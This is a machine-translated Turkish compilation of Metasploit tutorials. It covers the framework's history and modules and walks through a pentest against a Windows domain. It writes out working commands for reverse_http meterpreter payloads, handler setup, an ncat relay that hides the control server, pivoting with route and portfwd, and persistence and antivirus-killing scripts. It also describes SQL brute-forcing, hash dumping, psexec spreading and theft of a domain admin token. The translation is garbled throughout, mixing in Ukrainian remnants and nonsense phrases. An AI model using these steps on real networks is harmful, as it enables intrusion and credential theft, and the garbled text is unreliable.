Sonuç olarak, kabuğumuz bir ActiveX öğesi olarak kayıtlıdır ve etkileşim, HTTP protokolü kullanılarak IE'nin özel bir sürümü aracılığıyla gerçekleştirilir. Özellikle kurumsal bir ağ çalıştırdığınız için bu gerçekten harika, ancak her şey NAT'ın ve yalnızca kurumsal proxy sunucusundan gelen HTTP trafiğine izin veren gizli bir güvenlik duvarının arkasında. Bu durumda, özellikle proxy'yi nasıl yapılandıracağınızı bilmiyorsanız, yardım etmenin başka yolu yoktur. Ve burada - yenisindeki tüm proxy ve kimlik doğrulama ayarları (olduğu gibi) zaten IE'de kayıtlıdır.

Görüntülemek ve dinlemek mümkündür (192.168.0.102:443):

msfpayload windows/meterpreter/reverse_http PXHOST=192.168.0.102 PXPORT=443 PXURI=/ X > reflmeter102.exe

msf> istismar/çoklu/işleyiciyi kullan
msf> istismar -p windows/meterpreter/reverse_http -o PXHOST=192.168.0.102,PXPORT=443,PXURI=/

Üstelik PassiveX daha önce sadece IE6 altında çalıştığı için artık IE7/8 altında her şey yolunda.

Orijinal kabuklardan bahsedelim. İlk kabuk iyidir, eğer Meterpreter kullandıysanız, o zaman geri dönmek isteyeceksiniz.
Ve şimdi böyle bir imkanımız var. Diyelim ki kurbanımızın (192.168.0.101) 5678 numaralı bağlantı noktasında zaten bir birincil bağlama kabuğu var.

Yeni MSF'ye bağlanın:

msf> istismar/çoklu/işleyiciyi kullan
msf> istismar -p windows/shell_bind_tcp -o RHOST=192.168.0.101,RPORT=5678

Saldırgan bir komutla, Meterpreter'da birincil kabuğu yeniden oluşturduğumuzu söylemek isterim ama aynısı değil. MSF, Meterpreter geri bağlantısını genişletir ve başlattıktan sonra başka bir oturum oluşturur (başka bir bağlantı oluşturulur). Kötü olmasını istiyorum. Her şeyin işe yaraması için, ana makinemizin global değerlerini ayarlamamız (tersinin bağlandığı yer) ve ardından oturumu "yeni" yapmamız (örneğin, "1"imiz var):

msf> LHOST 192.168.0.102'yi ayarla
msf> LPORT 6666'yı ayarla
msf> oturumlar –u 1

Sonuç olarak, birincil kabuğun voltajı ve voltajı ortadan kaldırılır.

Meterpreter'dan bahsetmeden önce. Uzun zamandır bunu diğer platformlara (linux, Macos) aktarmaya çalışıyorlar ama orada henüz her şey yolunda gitmiyor. Neyse, iyi haberler var: Gördüğüm kadarıyla Meterpreter PHP'ye taşınıyor! Tüm işlevlerin PHP tarafından uygulanamayacağını düşünüyorum, ancak çoğu zaten mevcut. Böylece harap olmuş sunucuyu doldurabilir ve böylesine havalı bir kabukla sakinleşebilirsiniz.

Şimdi güvenlik önlemlerinden bahsedelim. Çoğu MSF modülü vekil sunucuları desteklemese de, mücadele baskısı özellikle zorludur. Aje mi istemiyorum, virahuvali olalım :). Böylece eski tarz bir özellik olan portforwarding'i ortaya çıkardık.

Diyelim ki backconnect kabuklarını kontrol eden MSF’li sunucumuz “192.168.0.103:5555” adresinde bulunuyor. Daha sonra 80 numaralı bağlantı noktasındaki sahte bir sunucuda netcat'e bağlanıyoruz:

ncat --sh-exec “ncat 192.168.0.103 5555” –l 80 --açık tutma

Ve payloadlarda sahte sunucunun IP'sini (veya DNS'sini) ve portunu kaydederiz.
Konuşmadan önce netcat, kabuğun kendisinin izin vermediği trafiği şifrelemenize olanak tanıyan SSL'yi destekler.

Sömürü sonrası

Şimdi en lezzetli kısma geçelim: kullanım sonrası ve ölçüm cihazı. Eminim Meterpreter'a aşinasınızdır, bu yüzden onun ne kadar iyi (ve bunu yaptıktan sonra kendini mahrum bırakmaz ve chroot'ta çalışır) ve işlevsel (hack araçlarını dahil etme, estru ta'yı değiştirme) olduğunu anlayacaksınız. dosya sistemi, süreçlere ve belirteçlere göre geçiş, yönlendirme) Hiçbir sorunum yok :).

Kurumsal ağdaki bilgisayarlardan birine (192.168.146.129) erişimimizin reddedilmiş olması ve biz (192.168.0.102) başarımızı genişletmek istiyoruz - aboneyi tarayın vb.

Msfconsol'a bir rota (alt ağ, maske, yönlendirme için oturum) ekleyin:

msf> rota ekleme 192.168.146.0 255.255.255.0 1

Nmap'in bu rotayı hızlı bir şekilde kullanmak istememesi üzücü; belki de entegrasyon henüz o kadar derin değil. Bir saldırı geliştirmek için (herhangi bir özel ayar olmadan) temel modülleri, katmanları ve tarayıcıları sakin bir şekilde kullanabilirsiniz (inanılmaz küçük olanlar) - MSF tüm yönlendirmeyi üstlenir.

Mevcut ana bilgisayarların harici ağa erişimi olabileceğinden (bildiğimiz gibi), onlarla iletişim kurmak için zaten harcanmış bir kurban üzerinde port yönlendirmeyi kullanabilirsiniz, neyse ki, Meterpreter bunu yapıyor:

Meterpreter> portfwd ekle -l 8008 -p 2222 -r 192.168.0.101

Şimdi ittifakların payloadlarını LHOST=192.168.146.129, LPORT=8008 yazıyoruz ve her şey birinci sınıf olacak.

Meterpreter'ın inanılmaz bir gücü var - Ruby komut dosyalarının yardımıyla eylemlerin otomasyonu. Bu gerçekten havalı. Diğer komut dosyalarını msf3scriptsmeterpreter'da, kullanım saati altında - yazma çalıştırması ve iki sekme (konuda olmayanlar için :)) görebilirsiniz. Komut dosyalarını, run komutu aracılığıyla manuel olarak veya sunucu/sunucunun yapılandırması sırasında AutoRunScript veya InitialAutoRunScript değişikliklerini girerek çalıştırabilirsiniz. Başka bir değişiklik kabuk başlatılmadan önce yapılır, ilk değişiklik daha sonra yapılır.

Kurulumda zaten en standart olanlardan çok sayıda komut dosyası bulunmaktadır:

  • winenum - sistemle ilgili tüm bilgileri ağdan yüklü yazılıma ve karmalara kadar hızlı bir şekilde toplar;
  • kalıcılık, metsvc - kayıt defterinde otomatik başlatma için Meterpreter'ı bir hizmet olarak kaydeder;
  • getcountermeasure – ateşi açar, çeşitli antivirüslerin ve güvenlik duvarlarının işlemlerini sonlandırabilirsiniz.

Yenisiyle değiştirme

Yazıda bunu yeni bir şekilde (Rus dzhereli için ortak) ve kötülüğün tüm aşamalarında anlatmaya çalıştım, bu yüzden bahse girerim ki size iyi gelecektir. Buna ek olarak, hiçbir zaman uygulanmayan birkaç parlak fikir doğdu ve MFS'de, sorun ortaya çıkmadan önce düzeltileceğini sandığım bir takım tuhaf hatalar keşfedildi. Zagalom ile yaratmak harika!

İpuçları:

  • msfconsol, Tab tuşuna basıldığında otomatik tamamlama işlemini gerçekleştirir ve tüm komutlar "-h" yardım parametresini destekler.
  • Arka plan komutunu uzaklaştırmak istiyorsanız – Ctrl+C, arka plana gidin – Ctrl+Z.
  • Cygwin'de metni kopyalamak için sol/sağ fare düğmesini kullanın, yapıştırın – Shift+Insert.
  • Windows altında msfcli, msfpayload vb. arayüzlere erişiminiz vardır. Bu cygwin konsolu aracılığıyla yapılabilir. Tüm işlevler yeterince çalışamayacağından dikkatli bir şekilde test etmek önemlidir.

IB'yi denetlemek ve kalem testleri yürütmek için Kali Linux dağıtımına yönelik pratik bir kılavuz. Bugün bu dağıtımda yer alan araçlardan birine büyük saygı duyuyorum. Metasploit Çerçevesi . Projenin geçmişine bir göz atın; paketin pratik gelişimini kolaylaştıracak özel referanslar ve belgeler sunacağız. Metasploit

Projenin tarihi

2003 yılında bir hacker olarak bilinen "HD Moore" , hızlı yazma ve kullanım için bir araç geliştirme fikri aklıma geldi. Böylece herkesin bildiği bir proje doğdu Metasploit projesi .

Çerçevenin ilk versiyonu kendi Perl'imde yazılmıştı; bu, sözde grafik arayüzün yerine küfür kitaplığını koydu. O zamanlar, bu sadece farklı istismarların ve komut dosyalarının bir koleksiyonuydu ve bunlar hakkındaki gizli bilgiler tek bir veritabanında saklanıyordu. Komut dosyalarını çalıştırmak için gereken hassasiyet hakkındaki bilgiler genellikle günlük olarak mevcuttu. Ayrıca, belirli bir cilt durumu için kesin olarak belirlenmiş çözümlerin değiştirilmesini gerektiren, iş sürecini karmaşıklaştıran ve yeni araçların geliştirilmesini karmaşıklaştıran bir sürü eski kod da taşıyorlardı.

HD Moore'dan önceki başka bir (2.x) sürüm üzerinde çalışırken Matt Miller Sadece birkaç gönüllü var. Üçüncü versiyon tamamen Ruby'de yeniden yazıldı ve Metasploit LLC (aynı geliştiriciler tarafından 2006 yılında kuruldu) tarafından geliştirildi. River 2008 lisansı aracılığıyla Metasploit Çerçevesi tescilliden BSD'ye değiştirildi. Hatta 2009'un sonlarında, sızıntı yönetimiyle ilgilenen Rapid7 şirketi, bu ilavenin duyurusunu yaptı. Metasploit Sızma testlerini gerçekleştirmek için özel yazılım paketi. Ayrıca yardımcı programın ticari olmayan sürümünün daha önce olduğu gibi herkesin kullanımına açık olacağı açıklandı.

Çerçevenin gelişinden bu yana çok şey değişti.

PRO ve Topluluk sürümleri ortaya çıktı ve 2010 yılında "düşük vasıflı" muhasebeciler için basitleştirilmiş bir sürüm yayınlandı - Metasploit Ekspres .

Sürümler

Bugün Metasploit dört versiyonda genişletildi:

  • Çerçeve – konsol arayüzlü temel sürüm;
  • Toplum- ücretsiz sürüm Buna bir web arayüzü ve ticari versiyonların bazı işlevleri dahildir;
  • Ekspres - ticari müşteriler için, temel denetimleri kolayca gerçekleştirmenize ve bunlardan raporlar oluşturmanıza olanak tanıyan işlevsellik içerir;
  • Pro - en gelişmiş sürüm, saldırıları gerçekleştirmek için artırılmış yetenekler sağlar, denetim talimatlarını formüle etmenize, raporlar oluşturmanıza ve çok daha fazlasına olanak tanır.
Community, Express ve Pro sürümlerinde bulunan web arayüzüne ek olarak, çerçeve için kullanıcı dostu ve sezgisel bir GUI arayüzü sağlayan Armitage ve Cobalt Strike gibi projeler de bulunmaktadır.

Armitage grafik kabuğu

Diğer arayüzlerle uyumlu Armitaj Ağ düğümlerini taramak, kaynak hırsızlığını analiz etmek, açıklardan yararlanmaları tespit etmek ve saldırı sistemi üzerinde tam kontrol elde etmek de dahil olmak üzere bir saldırının tüm aşamalarını görsel olarak tanımlamanıza olanak tanır.

Programın tüm işlevleri yapılandırılmıştır ve menüden ve program sekmelerinden erişilebilir, böylece bilgisayar güvenliğine başlayabilirsiniz. Program, Linux ve Windows platformlarındaki wiki'ler için tasarlanmıştır. Perakendecinin web sitesinde sunun Hafta sonu kodları, Dovidkov'un arkadaşları metin ve video formatında.

Temel anlayış

1. Veritabanı

Paketle çalışmaya başlamadan önce, veritabanının ana bilgisayarlar, hizmetler, sorunlar vb. hakkındaki bilgileri kaydetme yeteneğine erişmeniz gerekir. Tabana bağlanmak, çerçevenin işleyişi için beyne çok fazla yük getirmez, ancak aynı zamanda verimliliğin artmasına da katkıda bulunur.

Metasploit PostgreSQL kullanıyorsanız, kullanmadan önce sisteminize bir DBMS kurmanız gerekecektir. Daha sonra çalışan şeyi yeniden dönüştürün gerekli hizmetler Veritabanı ve çerçeve.

2. Çerçeve yapısı

“Kalp” Metasploit – Rex kütüphanesi. Genel öneme sahip işlemler için gereklidir: soketlerle yapılan işlemler, protokoller, metin biçimlendirme, kodlamayla yapılan işlemler ve benzeri. Kütüphane buna dayanıyor MSF Çekirdeği "düşük düzeyli" API'nin temel işlevlerini sağlayan. Bu vikoryst kütüphanesi MSF Base, eklentiler için bir API, bir koristuvach arayüzü (hem konsol hem de grafiksel) ve ayrıca bağlı modüller .

Beklenen işlevselliğe bağlı olarak tüm modüller çeşitli türlere ayrılmıştır:

  • Faydalanmak- tüm sistemdeki şarkı akışını çalıştıran kod (örneğin, yığın yeniden doldurma)
  • Yük- istismar yürütüldükten sonra hedef sistemde çalışan kod (bağlantıyı kurar, kabuk betiğini başlatır vb.)
  • Postalamak- başarılı bir girişten sonra sistemde çalışan kod (örneğin, şifreleri toplar, dosyaları şifreler)
  • Kodlayıcı- Antivirüslere karşı maskeleme yöntemini kullanarak modüllerin gizlenmesine yönelik araçlar
  • hayır- NOP jeneratörleri. Bu, günlük operasyonlara müdahale etmemek için bir montajcı talimatıdır. Boş eşyaları depolayacak Vikorist vicon dosyaları gerekli boyuta ayarlamak için

    Ek- sınır taraması, trafik analizi vb. için modüller.

3. MSFCONSOLE komutları

Grafiksel arayüzlerin varlığına bakılmaksızın, Metasploit ile çalışmanın en yaygın yolu, daha önce olduğu gibi, konsol arayüzünü kaldırmaktır. msfconsole .

Ana komutlara bir göz atalım:

  • kullanmak- Robotlar için Vibrati şarkı söyleme modülü;
  • geri- çalıştırma, ters kullanım: seçilen modülle çalışmaya başlayın ve geri dönün;
  • göstermek- Şarkı söyleme tipindeki modüllerin bir listesini görüntüleyin;
  • ayarlamak- Şarkı nesnesinin anlamını ayarlayın;
  • koşmak- gerekli seçenekleri yükledikten sonra ek modülü başlatın;
  • bilgi- modül hakkındaki bilgilerin görüntülenmesi;
  • aramak- Şarkı söyleme modülünü bilin;
  • kontrol etmek- tüm şişeleme sistemine uygun olup olmadığını kontrol edin;
  • oturumlar- Mevcut oturumların bir listesini görüntüleyin.

Çok çeşitli saldırıları uygulamak için bir platform oluşturan meçhul yardımcı programlardan oluşan penetrasyon testi (BT altyapısının güvenlik denetimi) için bir araç olarak kullanılabilir. Size pentest algoritması olarak kullanılabilecek birkaç Metasploit uygulaması göstereceğim. Bu durumda gücünü ve esnekliğini göstermek için metasploit kullanacağım. Metasploit'in kurulumu olarak Vikorist Backtrack 5 R2'ye yönelik saldırılar için bir platform olarak. Bu nedenle, postgresql DBMS'nin bağlantıları kabul ettiği için orada çalıştığını not etmek çok önemlidir. Test senaryolarına yönelik ölçüm – 192.168.3.0/24.
Başlayalım;)

1. msfconsole'u açın ve veritabanının durumunu kontrol edin.

Tamam, metasploiter'ların mantıksal bilgi birimleri olarak kullandıkları çalışma alanlarından bahsedelim. Farklı sızma testleri için farklı çalışma alanlarını veya sızma testleri için farklı konumları kullanabilirsiniz. Bu şekilde, farklı çalışma alanları arasında verileri içe/dışa aktarmak kolaydır.

Bir çalışma alanında, ana bilgisayarlar, hizmetler, güvenlik açıkları, yağma ve notlar gibi küçük bir veri tablosu kaydedilir.
Bu tabloya, örneğin bir ana bilgisayar tablosu ekleyerek bilgileri manuel olarak ekleyebilirsiniz.


Hizmetler tablosuna bir hizmet de ekleyebilirsiniz.


Bu tabloyu doldurmak için otomatik olarak db_nmap'i kullanabilirsiniz. Ayrıca herhangi bir (örneğin favoriniz) tarama yardımcı programını kullanabilir, çalışmasının sonuçlarını bir XML dosyasına aktarabilir ve ardından Metasploit'e aktarabilirsiniz. Bunu metasploit menüsünün ortasındaki db_import'u seçerek yapabilirsiniz (metasploit'in anladığı gibi çeşitli yanıt formatları - aşağıda).


Nmap ile tarayalım.

Bundan sonra hosts tablosunda hangi hostların bulunduğunu görelim.


Hizmetler tablosunda bizim için gereksiz olan öğeleri filtreleyebilirsiniz.

Smb sürümünü tarayan yardımcı modülü kullanan birçok Windows makinesi vardır.


Set komutunu kullanarak ana bilgisayarlardan birini seçin. Ale mi srobimo tek tek ev sahipliği yapar, bu nedenle ek üs için kolayca çalışın. Servis veritabanından 445 numaralı port ile hostları dosyaya ekliyoruz.


Taramadan sonra hizmetler tablosunu göreceksiniz.

Windows 2003 hizmet paketi 1 ile bir ana bilgisayar olan Windows 2003'ü barındırabiliriz. Çoğu ana bilgisayar adı ve alan adı “TEST”tir.
Çözülmüş bilgiler (Ana bilgisayar adlarında durumun böyle olduğunu varsayıyorum):
TEST-EMEA-DC-01 - etki alanı denetleyicisi
TEST-EMEA-DB-01 - veritabanı sunucusu

Tamam, potansiyel bir veritabanı sunucusuyla çalışalım.

MSSQL DBMS'nin orada kurulu olduğunu varsayarsak (çünkü Windows...), listede yer alan 1433 numaralı bağlantı noktasında çalışır. "Körü körüne vuracağım" ve MSSQL DBMS için bir test çalıştırmayı deneyeceğim.


İşe yaramış gibi görünüyor.

İyi. Mssql örneğini oluşturalım. SQLEXPRESS'in 1043 numaralı bağlantı noktasında çalıştırın. Geçerli sürüm, Microsoft SQL 2005 SP3'ü temsil eden bir yapı olan 9.00.4035.00'dır. Hizmetler tablosuna baktığınızda orada neler değişti?

Anladım: 1043 numaralı bağlantı noktası mssql ve UDP bağlantı noktası 1433'tür. Bu, mssql'nin gerçekten kullanıldığı bağlantı noktasıdır.
Artık veritabanı servisinin bu portta çalıştığını biliyoruz ve kaba kuvvet saldırısı, vikory saldırısı ve aynı metasploit organize edebiliriz.

Lütfen uzak bağlantı noktasının doğru numarasını (DBMS bizi 1043 numaralı bağlantı noktasından dinler), kullanıcı adını ve şifreyi belirtin.

Başlatalım ve şifreyi başarıyla bulalım.

TAMAM. Bu şifre ve bu da adamımızın kimlik bilgisi. Kredi tablosunun sunabileceği çok şey var.


Bir istismar yaratmanın zamanı geldi.


İstemcinin adını, şifresini ve bağlantı noktasını biliyoruz.


Meterpreter kabuğunu kaldıralım.

Bu oturum hakkında bilgi verelim. Seans listesine geri dönün, oraya 1 seans ekleyeceğiz.


Daha sonra size sistemi çalıştırdıktan sonra oluşan çeşitli modüllerin geçmişini göstereceğim.

Smart _hashdump'ı kullanarak karmaları doğrulayabilirsiniz. SESSIONS ve GETSYSTEM parametrelerini kuracağım.

Başlatıyorum.


Yağma tablosu için bir güncelleme olabilir.
SYSTEM ve 2 karmanın ayrıcalıklarını kaldırdım. Geçerli bir yönetici hesabının olduğu anlaşılıyor ("localadmin" hesabının RID'si 500'dür).

Yağma tablosuna bakalım.

Masada 3 lezzet var.

Bu şifrenin yönetici tarafından diğer sistemlerde kullanılıp kullanılmadığını kontrol edeceğim. Bu amaç için ihtiyacım olan her şeyi yapabilirim.

Hizmetler tablosundan ana bilgisayarların bir listesini ekleyeceğim (bunu daha önce kaydetmiştik).


Lamati hash olmayacak (ama olacak mı?) Sadece hayret edeceğim. BLANK_PASSWORDS ve USER_AS_PASS parametrelerini "saçma" değerine ayarlayın.

Lansmandan sonra birçok başka girdi var. Vinovok - yöneticinin uçtaki birçok makine için tek bir şifresi vardır.

Birkaç kimlik belgesi daha bulundu.


havalandım yerel şifreler farklı Windows sistemlerine. Belki vikorystvati istismarı
psexec, aksi takdirde tüm ana bilgisayarları tek tek manuel olarak incelemek zorunda kalabilirsiniz, ancak bu mümkün değildir.
Açıklardan yararlanmalarda, RHOSTS değil, RHOST parametresini ayarlamanız gerekir ve bu nedenle dökülmeleri aramak için bir ana bilgisayar listesi ayarlayamazsınız.
Ek komut dosyaları kullanarak bu işlemi nasıl otomatikleştirebileceğinizi size göstereceğim.

İnternetteki çeşitli kaynaklardan bu komut dosyası sızdırıldı. Kolayca değiştirebilir ve işlevsellik ekleyebilirsiniz.

Psexec'i çalıştırmaya başladım.
Ancak bu betiğin tamamını çalıştıramıyorum çünkü... burada vikoristasya korisne navantazhennya (yük) windows/meterpreter/reverse_tcp
Sorun burada yatıyor - duyduğum bağlantı noktası doğru olamaz. Bu nedenle vikorist veri yükü windows/meterpreter/bind_tcp.

Senaryomu başlatacağım.

Localadmin'in 9. oturumu ve bulut hesabı korunmaktadır.

Hala karmaları arıyoruz, şimdi bunu geleneksel olarak manuel olarak, cilt oturumuyla etkileşime girerek ve karmaları boşaltarak yapacağız.
Alternatif olarak kimlik bilgisi toplayıcı modülünü kullanabilirsiniz. Bu modül bize belirteç alan adları için karmalar ve (ki bu önemlidir!) gizli ve görünüm işlevlerini verecektir. Maalesef modül, her cilt oturumu için kendinizi adım adım manuel olarak başlatmanızı gerektirir, çünkü elbette karşılık gelen bir dosya yoktur, bu nedenle kokular kaydedilir.


Karma ve jeton toplamaya başlıyorum.

5. ve 6. oturumlar geçerli alan belirteçleri üretir.

Bir alan adını çalmayı deneyin ve işte - aynı alan adı yöneticisine erişimimiz var.

Metasploit'in yeteneklerini ve bu platformun bileşenlerini gösteren bir örnek.
Not: Hasarsız PDA'nız hayırlı olsun (!#)